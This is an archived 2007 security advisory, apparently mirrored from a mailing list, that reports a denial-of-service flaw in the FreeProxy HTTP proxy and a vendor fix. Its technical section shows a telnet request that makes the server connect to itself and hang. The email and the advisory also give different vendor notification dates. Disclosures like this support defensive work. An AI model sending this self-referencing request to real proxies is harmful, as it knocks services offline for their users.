AOH :: HP Unsorted F :: C07-2252.HTM

FreeProxy medium level security hole



Medium level security hole in FreeProxy
Medium level security hole in FreeProxy



--Boundary-00=_ypQyF8TQnOhcNwH
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

The FreeProxy HTTP proxy server suffers from a denial of service condition 
which causes the server to hang.  This occurs when an attacker makes a 
request for the hostname/portnumber combination in use by the server itself.  
The vendor was notified on the 10th January 2007 and a fix was made available 
on the 24th.  Full details can be found in the attached advisory.
-- 
Tim Brown
 
 

--Boundary-00=_ypQyF8TQnOhcNwH
Content-Type: application/pgp-keys;
  name="NDSA20070206.txt.asc"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
	filename="NDSA20070206.txt.asc"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nth Dimension Security Advisory (NDSA20070206)
Date: 6th February 2007
Author: Tim Brown  
URL:  /  
Product: FreeProxy 3.81/1511 (built 10-10-2004 @19:46:16)  
Vendor: Hand Crafted Software  
Risk: Medium

Summary

The FreeProxy HTTP proxy server is vulnerable to denial of service.

Technical Details

The FreeProxy HTTP proxy server hangs when it receives a request is made for the
for the hostname/portnumber combination in use by the server itself, like so:

$ telnet 10.0.0.1 8080
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
GET / HTTP/1.0
Host: 10.0.0.1:8080


Connection closed by foreign host.

The threads spike as it recursively connects to itself, then fall as each
thread times out waiting on the next, then the controlling threads themselves
appear to hang.  The OS will accept the connection (the usual 3 way handshake), but the server will not respond to any requests.

Solutions

Following vendor notification on the 16th January 2007, the vendor promptly
responded with a patched version which fixed this issue.  This was released
as build 1626 on the 24th January 2007.  Nth Dimension would recommend
upgrading to this version or later.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFFyQjwVAlO5exu9x8RAg4+AKCaUM2cg0oPhI4fu8H+r15zB/KAvwCgvsPj
00Zu6z04nvSSfnWUQONKaGc=gaWI
-----END PGP SIGNATURE-----

--Boundary-00=_ypQyF8TQnOhcNwH--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.